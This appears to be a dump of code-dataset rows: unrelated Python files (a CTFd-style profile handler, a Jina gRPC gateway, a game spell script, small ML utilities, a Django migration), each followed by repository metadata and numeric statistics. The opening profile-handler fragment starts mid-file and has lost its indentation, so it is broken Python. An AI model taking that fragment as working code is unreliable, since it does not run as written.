name = request.form.get('name')
email = request.form.get('email')
website = request.form.get('website')
affiliation = request.form.get('affiliation')
country = request.form.get('country')
user = Teams.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
names = Teams.query.filter_by(name=name).first()
name_len = len(request.form['name']) < 2
emails = Teams.query.filter_by(email=email).first()
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email)
password = request.form['password'].strip()
pass_short = len(password) == 0
pass_long = len(password) > 32
if ('password' in request.form.keys() and not len(request.form['password']) == 0) and \
(not bcrypt_sha256.verify(request.form.get('confirm').strip(), user.password)):
errors.append("Your old password doesn't match what we have.")
if not valid_email:
errors.append("That email doesn't look right")
if not get_config('prevent_name_change') and names and name != session['username']:
errors.append('That team name is already taken')
if emails and emails.id != session['id']:
errors.append('That email has already been used')
if not get_config('prevent_name_change') and name_len:
errors.append('Pick a longer team name')
if website.strip() and not validate_url(website):
errors.append("That doesn't look like a valid URL")
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if len(errors) > 0:
return render_template('profile.html', name=name, email=email, website=website,
affiliation=affiliation, country=country, errors=errors)
else:
team = Teams.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
team.name = name
if team.email != email.lower():
team.email = email.lower()
if get_config('verify_emails'):
team.verified = False
session['username'] = team.name
if 'password' in request.form.keys() and not len(request.form['password']) == 0:
team.password = bcrypt_sha256.encrypt(request.form.get('password'))
password = request.form['password'].strip()
team.website = website
team.affiliation = affiliation
team.country = country
name = team.name
if password:
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.change_user(name, password)
db.session.commit()
db.session.close()
return redirect(url_for('views.profile'))
else:
user = Teams.query.filter_by(id=session['id']).first()
name = user.name
email = user.email
website = user.website
affiliation = user.affiliation
country = user.country
prevent_name_change = get_config('prevent_name_change')
confirm_email = get_config('verify_emails') and not user.verified
return render_template('profile.html', name=name, email=email, website=website, affiliation=affiliation,
country=country, prevent_name_change=prevent_name_change, confirm_email=confirm_email)
else:
return redirect(url_for('auth.login'))
app.view_functions['auth.reset_password'] = reset_password
app.view_functions['auth.register'] = register
app.view_functions['views.profile'] = profile
| 45.609023 | 170 | 0.548714 | 1,337 | 12,132 | 4.857143 | 0.18923 | 0.047428 | 0.036957 | 0.020942 | 0.542039 | 0.486911 | 0.456113 | 0.421466 | 0.395904 | 0.352941 | 0 | 0.012757 | 0.334487 | 12,132 | 265 | 171 | 45.781132 | 0.791553 | 0.021513 | 0 | 0.356808 | 0 | 0.00939 | 0.162228 | 0.010619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0.215962 | 0.070423 | 0 | 0.187793 | 0.018779 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
1a08401fb30f5417d31f50f1d14aadf818b0ffd5 | 1,056 | py | Python | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | 6 | 2018-02-09T11:40:29.000Z | 2021-06-14T06:08:50.000Z | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | null | null | null | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | 7 | 2018-02-09T11:41:11.000Z | 2021-06-14T06:08:52.000Z | import logging
import subprocess
logging.basicConfig(level=logging.INFO,
format='%(levelname)s: %(name)s: %(message)s (%(asctime)s; %(filename)s:%(lineno)d)',
datefmt="%Y-%m-%d %H:%M:%S", )
logger = logging.getLogger(__name__)
def get_img_attributes(fname):
# ToDo: this should be refactored to be faster
s = subprocess.run([f'identify', '-verbose', f'{fname}'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
s = s.stdout.decode().split('\n')
try:
quality = int(list(filter(lambda x: 'Quality' in x, s))[0].split(': ')[-1])
except Exception:
logger.exception(f'Can not parse {fname} quality')
quality = 0
try:
soft = [x for x in s if 'Software' in x]
if soft:
soft = soft[0].split(': ')[-1].lower()
else:
soft = ''
except Exception:
logger.exception(f'Can not parse {fname} software')
soft = ''
return quality, soft
| 29.333333 | 105 | 0.535038 | 127 | 1,056 | 4.401575 | 0.511811 | 0.050089 | 0.025045 | 0.107335 | 0.168157 | 0.168157 | 0.168157 | 0.168157 | 0.168157 | 0 | 0 | 0.006878 | 0.311553 | 1,056 | 35 | 106 | 30.171429 | 0.762036 | 0.041667 | 0 | 0.222222 | 0 | 0.037037 | 0.193069 | 0.023762 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a0dcd546c9fb9cfb2c22a03b6cf3ce13d629047 | 3,531 | py | Python | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | 1 | 2020-12-23T08:58:49.000Z | 2020-12-23T08:58:49.000Z | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | null | null | null | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | null | null | null | import asyncio
import argparse
import os
from multiprocessing.synchronize import Event
from typing import Union, Dict
import grpc
import zmq.asyncio
from .async_call import AsyncPrefetchCall
from ... import BasePea
from ....zmq import send_message_async, recv_message_async, _init_socket
from .....enums import SocketType
from .....proto import jina_pb2
from .....proto import jina_pb2_grpc
__all__ = ['GatewayPea']
class GatewayPea(BasePea):
def __init__(self,
args: Union['argparse.Namespace', Dict],
ctrl_addr: str,
ctrl_with_ipc: bool,
**kwargs):
super().__init__(args, **kwargs)
self.ctrl_addr = ctrl_addr
self.ctrl_with_ipc = ctrl_with_ipc
def run(self, is_ready_event: 'Event'):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
try:
asyncio.run(self._loop_body(is_ready_event))
except KeyboardInterrupt:
self.logger.info('Loop interrupted by user')
except SystemError as ex:
self.logger.error(f'SystemError interrupted pea loop {repr(ex)}')
except Exception as ex:
self.logger.critical(f'unknown exception: {repr(ex)}', exc_info=True)
finally:
self._teardown()
async def _wait_for_shutdown(self):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
with zmq.asyncio.Context() as ctx, \
_init_socket(ctx, self.ctrl_addr, None, SocketType.PAIR_BIND, use_ipc=True)[0] as sock:
msg = await recv_message_async(sock)
if msg.request.command == 'TERMINATE':
msg.envelope.status.code = jina_pb2.StatusProto.SUCCESS
await self.serve_terminate()
await send_message_async(sock, msg)
async def serve_terminate(self):
"""Shutdown the server with async interface
This method needs to be overridden when inherited from :class:`GatewayPea`
"""
await self.server.stop(0)
async def serve_forever(self, is_ready_event: 'Event'):
"""Serve an async service forever
This method needs to be overridden when inherited from :class:`GatewayPea`
"""
if not self.args.proxy and os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
self.server = grpc.aio.server(options=[('grpc.max_send_message_length', self.args.max_message_size),
('grpc.max_receive_message_length', self.args.max_message_size)])
jina_pb2_grpc.add_JinaRPCServicer_to_server(AsyncPrefetchCall(self.args), self.server)
bind_addr = f'{self.args.host}:{self.args.port_expose}'
self.server.add_insecure_port(bind_addr)
await self.server.start()
self.logger.success(f'{self.__class__.__name__} is listening at: {bind_addr}')
# TODO: proper handling of set_ready
is_ready_event.set()
await self.server.wait_for_termination()
async def _loop_body(self, is_ready_event: 'Event'):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
try:
await asyncio.gather(self.serve_forever(is_ready_event), self._wait_for_shutdown())
except asyncio.CancelledError:
self.logger.warning('received terminate ctrl message from main process')
await self.serve_terminate()
def __enter__(self):
return self
| 38.802198 | 112 | 0.652223 | 437 | 3,531 | 5.022883 | 0.336384 | 0.025513 | 0.032802 | 0.021868 | 0.21549 | 0.185877 | 0.185877 | 0.153986 | 0.153986 | 0.153986 | 0 | 0.002262 | 0.248938 | 3,531 | 90 | 113 | 39.233333 | 0.825415 | 0.029453 | 0 | 0.061538 | 0 | 0 | 0.124126 | 0.041265 | 0 | 0 | 0 | 0.011111 | 0 | 1 | 0.046154 | false | 0 | 0.2 | 0.015385 | 0.276923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a0ddf6aed80f212b94b5faabe9879bd5b5f6957 | 895 | py | Python | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-04-26T08:03:56.000Z | 2021-04-26T08:03:56.000Z | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 2 | 2021-06-11T05:55:01.000Z | 2021-08-03T23:41:02.000Z | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-05-17T15:37:58.000Z | 2021-05-17T15:37:58.000Z | from toee import *
def OnBeginSpellCast(spell):
print "Improvisation OnBeginSpellCast"
print "spell.target_list=", spell.target_list
print "spell.caster=", spell.caster, " caster.level= ", spell.caster_level
def OnSpellEffect(spell):
print "Improvisation OnSpellEffect"
spell.duration = spell.caster_level #1 round/cl
spellTarget = spell.target_list[0]
bonusPool = spell.caster_level * 2 #Luck Pool is twice casterlevel
bonusToAdd = spell.caster_level/2 #single bonus cannot exeed half casterlevel
spellTarget.obj.condition_add_with_args('sp-Improvisation', spell.id, spell.duration, bonusToAdd, bonusPool, 0, 0, 0)
spellTarget.partsys_id = game.particles('sp-Heroism', spellTarget.obj)
spell.spell_end(spell.id)
def OnBeginRound(spell):
print "Improvisation OnBeginRound"
def OnEndSpellCast(spell):
print "Improvisation OnEndSpellCast" | 35.8 | 121 | 0.755307 | 109 | 895 | 6.091743 | 0.422018 | 0.099398 | 0.138554 | 0.051205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009174 | 0.147486 | 895 | 25 | 122 | 35.8 | 0.861075 | 0.09162 | 0 | 0 | 0 | 0 | 0.225647 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a118f7d8b03da075a37997cfb06c80ceb08fc58 | 907 | py | Python | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 47 | 2017-07-15T02:13:18.000Z | 2022-01-01T09:37:59.000Z | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 3 | 2018-06-22T13:55:12.000Z | 2020-01-29T01:41:13.000Z | mobula/operators/Multiply.py | wkcn/mobula | 4eec938d6477776f5f2d68bcf41de83fb8da5195 | [
"MIT"
] | 8 | 2017-09-03T12:42:54.000Z | 2020-09-27T03:38:59.000Z | from .Layer import *
class Multiply(Layer):
def __init__(self, models, *args, **kwargs):
self.check_inputs(models, 2)
Layer.__init__(self, models, *args, **kwargs)
def reshape(self):
self.Y = np.zeros(self.X[0].shape)
def forward(self):
self.Y = np.multiply(self.X[0], self.X[1])
def backward(self):
self.dX = [np.multiply(self.dY, self.X[1]), np.multiply(self.dY, self.X[0])]
class MultiplyConstant(Layer):
def __init__(self, model, *args, **kwargs):
self.check_inputs(model, 1)
Layer.__init__(self, model, *args, **kwargs)
self.constant = kwargs["constant"]
def reshape(self):
self.Y = np.zeros(self.X.shape)
def forward(self):
self.Y = self.X * self.constant
def backward(self):
self.dX = self.dY * self.constant
Multiply.OP_L = MultiplyConstant
Multiply.OP_R = MultiplyConstant
| 32.392857 | 84 | 0.624035 | 126 | 907 | 4.333333 | 0.253968 | 0.064103 | 0.065934 | 0.06044 | 0.589744 | 0.377289 | 0.113553 | 0.113553 | 0.113553 | 0 | 0 | 0.009929 | 0.222712 | 907 | 27 | 85 | 33.592593 | 0.764539 | 0 | 0 | 0.25 | 0 | 0 | 0.00882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.041667 | 0 | 0.458333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a1fd264d38d2e67d8ce555d1064ae3d9aad16df | 141 | py | Python | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | 1 | 2019-08-21T00:49:34.000Z | 2019-08-21T00:49:34.000Z | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | null | null | null | abc/abc145/abc145b.py | c-yan/atcoder | 940e49d576e6a2d734288fadaf368e486480a948 | [
"MIT"
] | null | null | null | N = int(input())
S = input()
if N % 2 == 1:
print('No')
exit()
if S[:N // 2] == S[N // 2:]:
print('Yes')
else:
print('No')
| 11.75 | 28 | 0.411348 | 24 | 141 | 2.416667 | 0.5 | 0.103448 | 0.103448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040816 | 0.304965 | 141 | 11 | 29 | 12.818182 | 0.55102 | 0 | 0 | 0.222222 | 0 | 0 | 0.049645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a7e0cc5a6d14c321badeeffabba58fb153ebc18b | 657 | py | Python | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 5 | 2021-09-28T15:02:21.000Z | 2022-03-23T14:37:51.000Z | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 69 | 2021-09-28T14:21:24.000Z | 2022-03-31T17:12:19.000Z | eap_backend/eap_api/migrations/0005_alter_eapuser_is_active.py | alan-turing-institute/AssurancePlatform | 1aa34b544990f981a289f6d21a832657ad19742e | [
"MIT"
] | 1 | 2021-09-28T15:11:00.000Z | 2021-09-28T15:11:00.000Z | # Generated by Django 3.2.8 on 2022-05-31 10:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("eap_api", "0004_auto_20220531_0935"),
]
operations = [
migrations.AlterField(
model_name="eapuser",
name="is_active",
field=models.BooleanField(
default=True,
help_text=(
"Designates whether this user should be treated as active. "
"Unselect this instead of deleting accounts."
),
verbose_name="active",
),
),
]
| 25.269231 | 81 | 0.531202 | 63 | 657 | 5.412698 | 0.84127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07598 | 0.378995 | 657 | 25 | 82 | 26.28 | 0.759804 | 0.068493 | 0 | 0.157895 | 1 | 0 | 0.252459 | 0.037705 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a7e26aa446e86411030f396561a3b8cb6f32b961 | 465 | py | Python | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | 1 | 2021-08-20T07:38:09.000Z | 2021-08-20T07:38:09.000Z | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | 5 | 2021-03-19T15:50:42.000Z | 2022-03-12T00:53:17.000Z | lucid_torch/transforms/monochrome/TFMSMonochromeTo.py | HealthML/lucid-torch | 627700a83b5b2690cd8f95010b5ed439204102f4 | [
"MIT"
] | null | null | null | import torch
class TFMSMonochromeTo(torch.nn.Module):
def __init__(self, num_dimensions: int = 3):
super(TFMSMonochromeTo, self).__init__()
if not isinstance(num_dimensions, int):
raise TypeError()
elif num_dimensions < 2:
raise ValueError()
self.num_dimensions = num_dimensions
def forward(self, data: torch.Tensor):
return data.expand(data.shape[0], self.num_dimensions, *data.shape[2:])
| 31 | 79 | 0.658065 | 55 | 465 | 5.309091 | 0.527273 | 0.267123 | 0.174658 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011268 | 0.236559 | 465 | 14 | 80 | 33.214286 | 0.811268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0.090909 | 0.454545 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a7e93039a39687c72a48499f5a446f6400a42bad | 412 | py | Python | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | 1 | 2017-05-04T18:48:45.000Z | 2017-05-04T18:48:45.000Z | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | null | null | null | data-structures/trees/node/node.py | b-ritter/python-notes | e08e466458b8a2987c0abe42674da4066c763e74 | [
"MIT"
] | null | null | null | class Node():
def __init__(self, value=None):
self.children = []
self.parent = None
self.value = value
def add_child(self, node):
if type(node).__name__ == 'Node':
node.parent = self
self.children.append(node)
else:
raise ValueError
def get_parent(self):
return self.parent.value if self.parent else 'root' | 27.466667 | 59 | 0.553398 | 48 | 412 | 4.541667 | 0.4375 | 0.137615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.342233 | 412 | 15 | 59 | 27.466667 | 0.804428 | 0 | 0 | 0 | 0 | 0 | 0.01937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0 | 0.076923 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.